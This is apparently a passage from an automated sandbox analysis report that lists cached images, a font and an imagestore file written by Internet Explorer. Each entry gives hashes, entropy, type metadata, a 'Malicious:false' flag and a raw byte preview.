                                                                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\po60zt0\imagestore.dat
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                  Entropy (8bit):7.02796131261223
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGO:u6tWu/6symC+PTCq5TcBUX4bk
                                                                                                                                                                                                                                  MD5:64C1F95D389E542A5507595EF36BB6F4
                                                                                                                                                                                                                                  SHA1:687055560E7028B48367EFC0F00AF15A9C449E38
                                                                                                                                                                                                                                  SHA-256:645D8B9AE466843F9702552953F3F07B04F147B20628D5B53BC06782EC7563C0
                                                                                                                                                                                                                                  SHA-512:27B109993B7D900F57A569E95C84B31BD7F55C5EF2E18D9CDCABDCFF1BD681AFFDE151787ACB6D6B9225998F876E60AB0B274E0C547673D30FF3849D437D2E45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ............;a.....;a....
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\4996b9[1].woff
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45633
                                                                                                                                                                                                                                  Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                                  MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                                  SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                                  SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                                  SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOfsCY[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30752
                                                                                                                                                                                                                                  Entropy (8bit):7.906234754194529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ITUs9uf7dj9BrZJEhs9zMVbj7xUp+6rqaxiatR8MiCqeB:Izuf7fhPE2zMVbh2rqaJnLiCLB
                                                                                                                                                                                                                                  MD5:AD584D72D7932711DB1D30832190E067
                                                                                                                                                                                                                                  SHA1:290EC377BC938991D3BDA888D74666EAD6CBB18A
                                                                                                                                                                                                                                  SHA-256:848B429A0185010DD921D927A29D5DFE2ED332D379E008CE465FA6508EB35948
                                                                                                                                                                                                                                  SHA-512:DB034AB85381270E3AFFBAD3B15FB94A9C1E894F2E1A84B13A0FB4D6D66FFDE158B70377068668BD721CA500D6AAB3788CEE6C830A7AFC8C48044A01E6AC2DEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z`-...P.(.h.......A..J.3@.Z..4.....P........r.n..j.5...}@.9....q@.@..Asp..$.Uj.q..15F....k.`...$..(..]?^.6X...a...<D&$..GZ....z.......x..,&.E.X7.:.p)^#.%......ac.{.V#<..].$....4.o.\....Q,.........zCM.-..2m1..x:MZ..$..&].#*...........<...4<..c>.E..>e....s..T..YjV..J...2q.YC.R....r....@pEw....f.X.#u.a]...-...+7..4....V.-0.@%0..C.sHc.h.E...1..&h.h.....@.@.a.I..:pk9#H.".>O...l..^H.J...`
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgI04[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18270
                                                                                                                                                                                                                                  Entropy (8bit):7.9654930351531235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+9YbKbipKBt5GG2Ggs8ARclXpMoPr/ndxiX8olNEH+pDBiDxo:+9YpaGG2A8ARg/PrnKX/lrpDBiDa
                                                                                                                                                                                                                                  MD5:6B3564FF9F6056768A8036657B2E0DAC
                                                                                                                                                                                                                                  SHA1:6E4BFC3BEE740EC8772B95C0A799619D5A182E6E
                                                                                                                                                                                                                                  SHA-256:5B9103D8CE4F9CA2DCAC9F39C48B1920A26878EC03FF50D0E295D5AED0EE8DAE
                                                                                                                                                                                                                                  SHA-512:D6649872B44DD18F2EC79287CEB8A5F755608C0F75553DBE7BA4EBFE477F3A5583C1EA6D23080E18439011DBBAA78D5600E30CAE1C5E13191D5B25AE19CAAFE9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R.).Ta.=D.~T.].|.Kg.}.h..%.......d..Wa........2.....V.f\.<.$.l.6......N.5t.....\y*.G.N..Ts..+..u..1I..`pC.b.'}Q3...%..2F.........m~.M.6...l.#.uf2..........f.2...V.kI....Rc.}...{.........d..%.o.W.~.SIu...W..^...RI...(;p. ....Z[......a..i?..>.\.j.]t/xsP.).|..L..<........y.....E\..+..)..ru..=X. .T..!n5.X.....,.v..1.X...,r4@.:.q.G.\...g.C&....WA...2...).T.EH.7\. .(.*......A..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgIQG[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4394
                                                                                                                                                                                                                                  Entropy (8bit):7.030110019355473
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Qf5uETAGK88888Z1sHvq2WNK0NVuwmS9CapNiWWWWd:QfQE9GHz0/mSTpNiWWWWd
                                                                                                                                                                                                                                  MD5:16BDA1AE195B38579F194CD823D801F8
                                                                                                                                                                                                                                  SHA1:A216736D1818913D2856B46D4FFB45661105AC34
                                                                                                                                                                                                                                  SHA-256:5923487B64BB2CE31EE68CAC5C68C4FF3992EC21AC7135CA9C84293E3FD711BC
                                                                                                                                                                                                                                  SHA-512:6C95E99091B76DE8994405AB13BE73427534B83A858FA6B9929419858935B30BBC1686BB60094FA82585646B07497FF83F5777F13CBC5F3D0B0E7DE68382415E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(......(......(......(......(......(......(......(......(......(......(......(....<...}k..O...Y.3....0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z......|/.Q...3......I....?.......?.0........Z.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgJ6C[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9430
                                                                                                                                                                                                                                  Entropy (8bit):7.764531777068338
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2sGHXqF6UeKGo3/VvhzFYjSpwT5B9sYDlCLBoSvRqg5ej4zKiAUH0Y8:NsG3qHP5/VvZFYjVsYDluAg5ej4zJAew
                                                                                                                                                                                                                                  MD5:DA3EF5D61CFCF919A9B3C8244CF1A338
                                                                                                                                                                                                                                  SHA1:6D13CC7968F716BC4A4B44DA6B48D5C5156A2A82
                                                                                                                                                                                                                                  SHA-256:26783E83884E406E82D42417274A97129D68F717B29B64D844397BDDF412634C
                                                                                                                                                                                                                                  SHA-512:BF62219E2BD0B0D261594B1E9597E30C695B661AE3BC59F62CB4770FE0F9D3539063B23C4B9B357FF33C360AEDCAA2A13C228046BD5BBE66D2A591E3EA511C72
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..@%...-.-.........(.h.R..1(......."....&..c).%.:..R..@.f..&sL..Ha...P ...E..P......0..4.Fi.9i.u.4.bc).!.a@...Z.(...%.................p4.qwR..&...d.@.(....!......zT....F.i.Q@!i.CL.P!M.#c.11....H...7Z.X..m...x..................@.Ha@.(.....3@..%...%..).}.....s@.GJL...H...D.().Ha..9W..F.&B...E0%QHb...dg.R a...a..8P.....P.@.@...LP0...0......J.(.........c....Hb.4...q7Q`.......c....Hd.qHc...
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgLtL[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12204
                                                                                                                                                                                                                                  Entropy (8bit):7.760356414393578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2ocxYvdubJzbjF4rcDHiz3U68cXNsT0t16iDUVVH6Gb029cbDc1+fCYyGqqpo2r:NosSuF3WggFk0tgioVV0dCYyGXn11sA/
                                                                                                                                                                                                                                  MD5:809C75ECB371E6428E0D21641C6758FD
                                                                                                                                                                                                                                  SHA1:06EF08CCC013EFF1AAD201C7F1BD3C288350B274
                                                                                                                                                                                                                                  SHA-256:3B7A81B0CEC9930FDAF2EE0BDCBD475ED69656DF7237B4795C8B021E3A71A725
                                                                                                                                                                                                                                  SHA-512:52D3EDCD559F525D6E941E63D88CC243A0F11212D7172AA089B672505D9DB94DB68BE1300E9BAB00D150E1E644891999483FFBDF0791E8E2EE8ECBA66E25D81F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...eX3@.&h..4.f....f.."..u....7P....u....7P.n..-H.d...~.x......Jo.h.g...W.......>..?.....O...\..F....._.c..vb.(M.B....eow..|........>F......}.....<Epq..s..O.w.1..|k}......8..rD\._..^....?.o.4.b..3$.....n.f.'.t.?.4....C.Qly.....o..4`.Y.....RC..@.3E....=.?..w/...B..~...n..E......ZW..>..`..L...J....fd...W....e..P..E...>........o.)|..G.>...=..1y.7..@.q......#....+......b.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgbmq[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6289
                                                                                                                                                                                                                                  Entropy (8bit):7.851523332145787
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:QfQErg7WA8UKQ9FQeAAdE7XqMnyVvzoTUtmnw66zfMcg84pGEuji9zoybBbqr:Qoag7WA8liF669N36eEtjpG9jFY2
                                                                                                                                                                                                                                  MD5:07F426B9CCD868F4A649262096340195
                                                                                                                                                                                                                                  SHA1:0FBB15A464AA610660FA0C4FC0DC541AF1714797
                                                                                                                                                                                                                                  SHA-256:D2CB2DD7DAE25A68EFB5F3365A6ECCF7D1754A497FA0CB933DF6753E395A5CB9
                                                                                                                                                                                                                                  SHA-512:5E79975D852BF819A942CD6FAE7744AD75A081EC1562F4F243CD01B86B5CCECEF7976D239AED3D30A215922D5CD239F329BA2E970364365571C8CB7CDD833B2C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j.....N..w.....Z......h..............H(..@....@.a@.#..g\.@...&M!.:........f.q.;..D.@..%.........p..4.C@.4....6......<..8..x.....".#<P..6..P..4G..&..c.7.q.....v.M.s.U\,t5D.@.......3@.@...P...m!.h..."j.e.(...@......p....l....t...#....&....f"..=.(..jr...@.{.Y"..@..7..&9..P.(....@.4.F..`..(.<.......P..$..}0..@#.(...."../ulZF.CRY.u.o.8.,V}3gj..=^.......a<....:.......f.P.y. .;x...PX..9
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgg4w[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34427
                                                                                                                                                                                                                                  Entropy (8bit):7.918466298596994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:I+HFDaHrcAEP0XopJxu7HSOGTD4GO23d7IGbKjfGZ:I+BaHTEP0+JxEHyDs23d8sKSZ
                                                                                                                                                                                                                                  MD5:8A893F65E7371978DBB67255A0EC14C2
                                                                                                                                                                                                                                  SHA1:E718E3AABA11B0D5879A00C27DAA901F93D2A7B5
                                                                                                                                                                                                                                  SHA-256:4DB575F619B4A904FA76FC2F85A217971B39FD20B61B3779C9D4FF6701984D44
                                                                                                                                                                                                                                  SHA-512:AD3D6E1A48D2F2E59B2516F563CB31E586BEE00C47F2B85E6B95D31ECDC77703FBA4E4A477EB5E4C98B3975195EBA296436DB03C25D49DEEEF774F886B13DF93
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+B.*.@..E.(...4....FM... ....;.Z.\.LC....H...qC....C.Tc.W..w..<t.".Pc.1..\}..L`...R...E!...vn ..y85.#F...-...P.@......P.@......P.@....P.@....P.@....P.@....P.@....P.@....P.@.@....P.@....P...L....3@.@.h...yJ.V@.E........P..~8.._Z@H(.ni.t......i..8.....-.x... .P.L..r).qR..@.l.3..UnE1.........u.c6Ra..( ....@..-...P.@....P.@.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@.@.......b..P
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOggwL[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12998
                                                                                                                                                                                                                                  Entropy (8bit):7.957875205331213
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:bOhTptS/mgGPq4AQF+2SK2Fdtlr0voY49wNPci77P:bOhbSugGPq4zFotlr0uIP
                                                                                                                                                                                                                                  MD5:1D942C6E3EDD1A02F198321F9F653842
                                                                                                                                                                                                                                  SHA1:CB8A9BCC50B7001222AA6ED0070701A91E8D48E1
                                                                                                                                                                                                                                  SHA-256:8C71199E78444BF4AF8F2FB06A29084CB7A3B79605DC8C7027A01AE146BCDCC2
                                                                                                                                                                                                                                  SHA-512:245C76AFABA723A5F404DBEF1FDAA3A35B97D58B9C0A5AF4467D64E4821A0B8A9CF8BCF4E46145A9E39D224C996AC06A4D625BDF21C0DBD6C5C027B70AA3D37E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:@...*9`M0.9.y....N2zR.(...4l.g?5&.p...].....d.D.0.T.J...%..,....(e!...iC...].....b....b....O..A..d4Ykg)...G1\..8\.....94i.S.N.6.e..7...X....X.r...}+D....&....@...G<u...]+\.<P..id..y$....++.......`.<..-......=j#.F5.4...G.cr.....ZZ....>l..;..Z...s.Z......`% .T.N0(...pN=..(...^.9..-...~.'..`RJ.B0:....n....O"n.....kJ7..IY....B...................P2._1C..Q-...M..:b.Y.H.....q.../..v
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgkHA[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8589
                                                                                                                                                                                                                                  Entropy (8bit):7.917883695837637
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Qo6znNwgr1T/regmhcvAa31b1TMu2UQa9uQEEa1Wkfq1:b6znNvRzycvj1TMurxET1bfq1
                                                                                                                                                                                                                                  MD5:464362B49496E353AABF75DA5015B426
                                                                                                                                                                                                                                  SHA1:51C5A1291B3B5746BB5602CD19F68ABA7FFCC838
                                                                                                                                                                                                                                  SHA-256:3F86873DB8AF0970856EE5493C1712D11444B75DA21B3F90E27495BA0AA4B943
                                                                                                                                                                                                                                  SHA-512:D51C63F9D6296FF7035B1D5AFA7973E22250B5A36CB56834F09045ABF87950B4F5F94763578D833B27626AA3981CE0C679C6730AE10CC248CD723E8F5645E2C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...Y.&h.....@.M1..`..AH....V..qd.b....J7Bn.....F.[..G,{..m.....S.7..xy..j]^~...z.\.U2w.*4...>y...G....#.}+M..<.+...G..............-.......v.....o..B.,......q..n..f.bkV.cT#..[...lJw.....D.;q.S..(.....!..c...v.\....q\].h.\.n....8...ihk....F....x.y...=.z.m.H.2M(......C$8..y5zc.R.....@.4..`..f..I..O.3E.l.i..p#.T.......>a..X.2[7.b.A..4..E.]3g.Z2......0...q....._....WX.E.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB14EN7h[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13764
                                                                                                                                                                                                                                  Entropy (8bit):7.273450351118404
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IfOm4cIa37nstlEM15mv7OAkrIh4McOD07+8n0GoJdxFhEh8:I2m4pa37stlTgqAjS0GoJd3yK
                                                                                                                                                                                                                                  MD5:DA6531188AED539AF6EAA0F89912AACF
                                                                                                                                                                                                                                  SHA1:602244816EA22CBE39BBD4DB386519908745D45C
                                                                                                                                                                                                                                  SHA-256:C719BE5FFC45680FE2A18CDB129E60A48A27A6666231636378918B4344F149F7
                                                                                                                                                                                                                                  SHA-512:DF03FA1CB6ED0D1FFAC5FB5F2BB6523D373AC4A67CEE1AAF07E0DA61E3F19E7AF43673B6BEFE7192648AC2531EF64F6B4F93F941BF014ED2791FA6F46720C7DB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......5.D..gJ.ks@..(...@.........l..pE..iT...t&..V.M..h....4.m.-.!....:...........*...a...CQ...c....Fj....F(...5 ..<.....J..E.0."..].6...B.K........k.t.A'p..KJ..*A....(......(......(......(......(......(......(......(......(.......K1......:...0......I...M.9..n..d.Z.e.Q..HfE....l^...h.h.t....(.9:.2....z...@.....:...3..w.@.P4Ac1.a.@...A#.P1... ..4..@.@.(.h.h.(....0....Y..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB14hq0P[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
